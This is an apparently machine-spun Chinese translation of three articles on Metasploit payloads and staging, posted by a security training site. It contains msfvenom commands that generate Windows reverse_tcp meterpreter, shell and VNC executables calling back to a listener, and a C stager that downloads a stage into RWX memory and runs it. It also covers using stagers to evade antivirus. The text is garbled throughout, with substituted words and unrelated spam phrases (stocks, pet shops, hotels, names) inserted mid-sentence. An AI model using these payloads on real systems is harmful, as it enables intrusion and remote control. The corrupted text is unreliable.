今日在线

腾讯股票,深化了解metasploit的payload,宠物店

原创: Yale 合天智汇

1、Metasploit- Payload

简略来说,Payload是黑客用来与被黑了的体系交互的简略脚本。运用payload,能够将数据传输到蒲剧舍饭现已沦亡的体系。

Metasploit有用载荷能够有三种类型-

Singles- Singles十分小,旨在树立某种通讯,然后进入下一阶段。例如,仅仅创立一个用户。

Staged- 是一种进犯者用来将更大的文件上传到沦亡的体系的payload。

Stages- Stages是由Stagers模块下载的payload组件。各种payload stages供给高档功用,没有规划约束,如Meterpreter和VNCInjection。

比方:

让咱们举个比方来了解Metasploitpayload的运用。假定咱们有一台易受DCOM MS03-026进犯的WindowsServer 2003计算机。

首要,咱们将查找能够运用此缝隙的exp。咱们将运用具有最佳RANK的缝隙运用。


然后咱们运用下列指令来看腾讯股票,深化了解metasploit的payload,宠物店看咱们能够运用的payload


看到列出的payload能够能协助咱们上传/履行文件,使沦亡的体系成为vnc服务器(能长途监督)


上图的指令将会显现能够协助咱们在受害者机器上上传/履行文件的payload


为了设置咱们需求的payload,能够运用下列指令


设置好监听主机和监听端口,受害者的主机和端口


输入“exploit”就会创立下图所示的会话


现在咱们能够依据此payload供给的设置来操作受害者的机器了。

原文:

https://www.tutorialspoint.com/metasploit/metasploit_payload.htm

2、HowPayloads Work

payload模块坐落modules/payloads/{singles,stages,stagers}/>。

当结构启动时,stages与stagers结合以创立可在缝隙运用中运用的完好的payload。然后,handlers与payload配对,因而结构将陈若盈知道如ca4112航班何运用给定的通讯机制创立会话。

Payload被赋予参阅称号,如下所示:

Staged payloads:/ [arch] / /

Single payloads:/ [arch] /

这会发作像windows/ x64 / meterpreter / reverse_tcp这样的payload。渠道是windows,架构是x64,咱们供给的终究的stage是meterpreter,而传递它的stager是reverse_tcp。

请注意,arch是可选的,因为在某些状况下,它是不必要或许现已默认了。比方php/ me腾讯股票,深化了解metasploit的payload,宠物店terpreter /腾讯股票,深化了解metasploit的payload,宠物店 reverse_tcp。PHP的payload不需求Arch,因为咱们供给的是解说代码而不是二进制代码。

Singles

Singlepayload发射后就不管了(就像发射x级火箭相同)。它们能够与Metasploit树立交流机制,但没有必要。你可能会需求si诗之本秋穗nglepayload的场景便是方针没有接入网络,此刻依然能够经过USB密钥供给文件格局进犯。

Stagers

Stagers是一个小发射器(相同以火箭发射作比方),旨在创立某种方式的通讯,然后将履行传递到下一个阶段。运用stager处理了两个问题。首要,它答应咱们开始运用较小的有用负载来加载具有更多功用的较大的payload。其次,它使通讯机制与终究阶段别离成为可能,因而一个payload无需仿制代码就能够与多个传输一同运用。

Stages

因为stager经过为咱们分配许多内存来介怀任何巨细约束问题,因而stages能够恣意大。它的长处之一是能够以更高档别的言语(如C法力战记言语)编写终究阶段的payload。

DeliveringStages

你期望payload衔接回来的IP地址和端口被嵌入到stager中。如上所述,一切staged payload仅仅腾讯股票,深化了解metasploit的payload,宠物店是树立通讯并履行下一阶段的小推进器。当运用staged payload创立可履行文件时,实际上仅仅创立了stager。所以以下指令将创立功用相同的exe文件:

msfvenom-f exe LHOST=192.168.1.1 -p windows/meterpreter/reverse_tcp

msfvenom-f exe LHOST=192.168.1.1 -p windows/shell/reverse_tcp

msfvenom-f exe LHOST=192.168.1.1 -p windows/vncinject/reverse_tcp


(请注意,它们在功用上是相同的- 可是因为其中有许多随机化,因而没有两个可明乐卡盟履行文件是完全相同的)

不管运用stager设置的哪种淮阳安岭火灾传输机制(例如:tcp,http,https),Ruby端都是充任客户端。

关于shell阶段,Metasploit会在你与其进行交互时将长途进程的规范输入输出衔接到你的终端。

在Meterpr传闻将军克妻eter阶段的状况下,Metasploit将开始运用Meterpret腾讯股票,深化了解metasploit的payload,宠物店erwire协议。

原文:

https://github.com/rapid7/metasploit-framework/wiki/How-payloads-work

3StagedPayloads – What Pen Testers Should Know

Metasploit结构将进犯与成功运用后履行的内容(payload)别离开来。Metasploit结构中的payload也分为两部分,即stager和stage。stager担任下载大型payload(stage),将其注入内存,并将履行动作传递给它。


Staging是必要的。许多可运用的状况约束了进犯者能够将多少未加载的字节加载到内存中的一个接连方位。在这些状况下进行后浸透的一种办法是分阶段传递payload。

Stagers通常用优化过的汇编言语编写。进犯者的方针是使stager尽可能小。一个小的stager能够让进犯者在更多的浸透环境下更自由地运用它。

此代码段显现用C编写的stager。分配缓冲区,下载阶stage,并将操控权传给它。

/*connect to the handler */

SOCKETmy_socket = wsconnect(argv[1], atoi(argv[2]));

/*read the 4-byte length */

intcount = recv(my_socket, (char *)&size, 4, 0);

if(count != 4 || size <= 0) punt(my_socket, "read a strangeor incomplete length value\n"); /* allocate a RWX buffer */buffer = VirtualAlloc(0, size + 5, MEM_COMMIT,PAGE_EXECUTE_READWRITE); if (buffer == NULL) punt(my_socket,"could not allocate buffer\n"); /* prepend a littleassembly to move our SOCKET value to the EDI register thanks mihifor pointing this out BF 78 56 34 12 => mov edi,0x12345678 */

buffer[0]= 0腾讯股票,深化了解metasploit的payload,宠物店xBF;

/*copy the value张思旋 of our socket to the buffer */

memcpy(buffer+ 1, &my_socket, 4);

/*read bytes into the buffer */

count= recv_all(my_socket, buffer + 5, size);

/*cast our buffer as a function and call it */

function= (void (*)())buffer;

function();

Staging完成了只需几个stager就能够供给各种payload的意图。只需我有与stager兼容的代码,我就能够向stager支撑的一切缝隙供给我的代码(相同,代码规划是一个约束)。这种灵活性使得像Beacon这样的有用载荷成为可能,而无需修正Metasploit结构。

运用stager也能够使躲避反病毒引擎变得愈加简略。Windows Meterpreter为700KB,CobaltStrike的Beacon为120KB。让咱们假定没有巨细约束 -假如我创立一个进犯包,按原样传递我想要的payload,我正在为反病毒软件供货商供给许多需求编写签名的文件。经过运用stager来传递payload,我只需重视获取stager和进犯包来绕过反病毒软件就能够了。假如stager没有被安全厂商发现,那么我的stage可能是安全的。

理论上,stage能够是任何巨细的恣意方位的代码。实际上,与Metasploit结构一同运用的stage是用C编写的DLL。这些DLL和由StephenFewer编写的反射DLL注入库进行编译。该库能够将库从内存加载到进程中。

在预备stage时,Metasploit结构会将引导代码添加到payloadDLL的开国之利刃游戏下载头。此引导代码在payloadDLL内存所在方位调用payloadDLL中的反射DLL注入函数。一旦stager将操控传递给它,这个引导代码与反射DLL注入库相结合,答应有用负载在没有触摸磁盘的状况下将本身缉捕一只耳加载到进程中。依据我的经历,此进程需求特定的编译器和设置适宜的环境变量才干正常作业。


假如你在wireshark中检查sta腾讯股票,深化了解metasploit的payload,宠物店ging的进程,将会看到未经过混杂的DLL经过网络传输。此刻简单被安全厂商发现;走运的是,MetasploitFramework现在能够挑选对第二个stage进行编码。这些选项是EnableStageEncoding和StageEncoder。Cobalt Strike的ListenerManager功用会主动设置这些选项。



惋惜的是,在MetasploitFramework东西集下,stager的巨细约束使得其他通讯选项更具挑战性。假如没有内置的Windows库来下载代码十分少的stage,那么为该协议编写一个stager就没什么含义了。假如没有stager至此某种协议,那么让Meterpreter或其士官组歌他payload运用该协议是沈玟雅没有意自爆鬼魂义的。逻辑是这样的 - 假如我能够stageover一种协议,那么我有必要能够经过它进行通讯。假如我不能stageover一北京物科宾馆种协议,我不应该盼望我能够首要stage某个payload。

Staged payload是浸透测验人员的利器。在成功浸透之后,珠海新海利酒店Stagers为咱们供给了许多灵活性。尽管这个进程对用户来说基本上是不行见的,但我写这篇文章是为了解说正在发作的作业。咱们越了解咱们的东西,咱们就有才能运用好它们。

原文:

https://blog.cobaltstrike.com/2013/06/28/staged-payloads-what-pen-testers-should-know/

4

三篇文章,由浅入深,先介绍了msfpayload的概念及运用,从而介绍了其作业原理,最终侧重介绍了stagedpayload。三篇文章是不同的大佬所写,今天再查阅相关材料时偶尔联系起来,所以翻译后集合在一同宣布,译者水平有限,大佬们萌新们看着高兴就好了。

5、相关试验

metasploit实践攻略:

http://www.hetianlab.com/cour.do?w=1&c=C172.19.104.182014120510572900001

metasploit之特殊使用:

http://www.hetian华泰重工制作有限公司lab.com/cour.do?w=1&c=CCID钱金耐5e07-87bb-4dc7-琦琪手机8bec-cf2fdfac89b4

本文为合天原创,未经答应,禁止转载。

相关文章